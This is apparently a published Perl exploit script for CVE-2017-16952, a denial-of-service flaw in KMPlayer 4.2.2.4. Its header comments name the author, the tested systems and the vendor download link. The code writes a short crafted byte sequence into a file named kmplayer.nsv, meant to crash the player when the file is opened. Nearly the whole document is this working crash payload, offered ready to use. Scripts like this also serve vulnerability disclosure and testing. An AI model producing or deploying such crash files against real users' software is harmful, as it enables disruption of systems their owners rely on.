20 lines
No EOL
741 B
Perl
Executable file
20 lines
No EOL
741 B
Perl
Executable file
#!/usr/bin/perl
|
|
# Exploit Title: KMPlayer .nsv Denial of Service
|
|
# Date: 2017-11-22
|
|
# Exploit Author: R.Yavari
|
|
# Version: v4.2.2.4
|
|
# Tested on: Windows 10 , Windows 7
|
|
# other version should be affected
|
|
# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
|
|
# such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
|
|
# CVE-2017-16952
|
|
# http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
|
|
# (D.P)
|
|
|
|
open(code, ">kmplayer.nsv") || die "can't create crash sample.$!";
|
|
binmode(code);
|
|
$data =
|
|
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45";
|
|
print code $data;
|
|
|
|
close(code); |